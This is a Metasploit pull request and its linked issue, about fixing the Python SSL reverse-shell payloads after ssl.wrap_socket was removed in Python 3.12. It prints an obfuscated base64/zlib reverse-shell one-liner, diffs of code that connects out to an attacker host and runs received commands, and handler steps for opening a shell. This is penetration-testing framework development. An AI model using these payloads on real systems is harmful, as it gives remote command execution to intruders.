### PR TITLE
Fix ssl wrap socket python314

### LINKED ISSUE #21301: cmd/unix/reverse_python_ssl Fails on Python 3.14
## Steps to reproduce

Test the `cmd/unix/reverse_python_ssl` payload with Python 3.14, see it fail

```
echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNptj81qwzAQhM/WU+hmiaoiNmlxCjqE4kAobUMTn41qbYipahmtnLx+Zez+Ul3EfrMzzLbvvfOBomveIAgcXnvvGkAUDgWiJejUpMnpY/O03tTbp/Ig5nH/fP9Q7w8v5fqRR49sXNdBExhLs1Uus9tCZjcrmeVFKpbx8bikYry8eN3XX8mRVmqjLQK5nFoLtHOxWnVHEqODVig9NGeWLfIlJ0l7pBY6NipcqUVcSrCiih78ACQZz1Df58id6+dlaaBxBlg6hON1kXKBJ7BWjTaBwbgh/PJtd+WIwfv/cNv9pbHZlFKftR1AjZqcSKyvDeP0in7CmDrD6JIInWE/zZx8AGzAi/E\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 4, in <module>
AttributeError: module 'ssl' has no attribute 'wrap_socket'
```

## Expected behavior

It should work. It should also continue to work with all of the same versions it used to.

## Current behavior

Right now it crashes, see the stack trace above.

### Metasploit version

Latest from git.

## Additional Information
It's imperative that the solution continues to work on all of the same version of python that it used to. An acceptable solution will not drop Python 2.7 support. The current module does work with Python 3.4, so the change where `ssl.wrap_socket` was dropped happend somewhere between 3.4 and 3.14. These types of command payloads aren't typically constrained by size, so increasing it to handle the extra Python versions isn't a major concern.

It's possible that other Python payloads are also affected by this issue where `ssl.wrap_socket` is invoked and will cause an exception. It would be helpful to investigate the other Python payloads to look for this and fix it as necessary.

Spotted while testing #21255.

### PR DESCRIPTION
**Pull request by VISHVAJITH-REDDY**
Fixes #21301

`ssl.wrap_socket()` was removed in Python 3.12 (deprecated since 3.7), causing an
`AttributeError` on Python 3.12+ including 3.14.

Replaces it with `SSLContext.wrap_socket()` using a getattr fallback chain that
works across Python 2.7.9 through 3.14+ without deprecation warnings.

## Files changed
- `modules/payloads/singles/cmd/unix/reverse_python_ssl.rb`
- `modules/payloads/singles/python/shell_reverse_tcp_ssl.rb`

## Verification

1. Start `msfconsole`
2. `use exploit/multi/handler`
3. `set payload cmd/unix/reverse_python_ssl`
4. `set LHOST <your IP>`
5. `set LPORT 4444`
6. `run`
7. On target: run the generated command with Python 3.14
8. **Verify** a shell session opens (previously crashed with AttributeError)
9. Repeat with `payload python/shell_reverse_tcp_ssl`
10. **Verify** same fix works on Python 2.7 / 3.4+ targets too

### CODE REVIEW

**Comment by jeanmtr** [comment]
`python/meterpreter/reverse_tcp_ssl` is also affected.

**Comment by VISHVAJITH-REDDY** [comment]
I've also fixed `lib/msf/core/payload/python/reverse_tcp_ssl.rb` in my fork 
but I see @jeanmtr has opened #21303 with a broader fix. Happy to defer to 
that PR or add the mixin fix to this one if preferred.

File: modules/payloads/singles/cmd/unix/reverse_python_ssl.rb [hunk 1]
```diff
@@ -64,10 +74,16 @@ def command_string
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
+
     if datastore['PythonPath'].blank?
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
```
Comment (bwatters-r7) [inline modules/payloads/singles/cmd/unix/reverse_python_ssl.rb:68]: Is there a reason to add this as a literal rather than using `py_create_exec`?

File: modules/payloads/singles/python/shell_reverse_tcp_ssl.rb [hunk 2]
```diff
@@ -42,22 +45,32 @@ def generate(_opts = {})
...
-      	so.sendall(o)
+      \td=so.recv(1024)
+      \tif len(d)==0:
+      \t\tbreak
+      \tp=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      \to=p.stdout.read()+p.stderr.read()
+      \tso.sendall(o)
     PYTHON
-
-    py_create_exec_stub(cmd)
```
Comment (bwatters-r7) [inline modules/payloads/singles/python/shell_reverse_tcp_ssl.rb:61]: Is this not necessary?

File: modules/payloads/singles/cmd/unix/reverse_python_ssl.rb [hunk 3]
```diff
@@ -51,11 +52,20 @@ def generate(_opts = {})
...
     # Set up the socket
     cmd += "import socket,subprocess,os,ssl\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    # ssl.wrap_socket() was deprecated in Python 3.7 and removed in Python 3.12.
+    # Use SSLContext.wrap_socket() instead, which is available from Python 2.7.9+
+    # and 3.2+. We fall back through PROTOCOL_TLS_CLIENT (3.6+) -> PROTOCOL_TLS
+    # (3.2-3.9) -> PROTOCOL_SSLv23 (2.7.9+) to cover all supported versions.
+    cmd += "ss=ssl.SSLContext(getattr(ssl,'PROTOCOL_TLS_CLIENT',getattr(ssl,'PROTOCOL_TLS',ssl.PROTOCOL_SSLv23)))\n"
```
Comment (bwatters-r7) [inline modules/payloads/singles/cmd/unix/reverse_python_ssl.rb:64]: Does this work on a subset of versions that the old way did?  Are we losing support for versions 2.5?

**Comment by smcintyre-r7** [comment]
Superseded by #21484
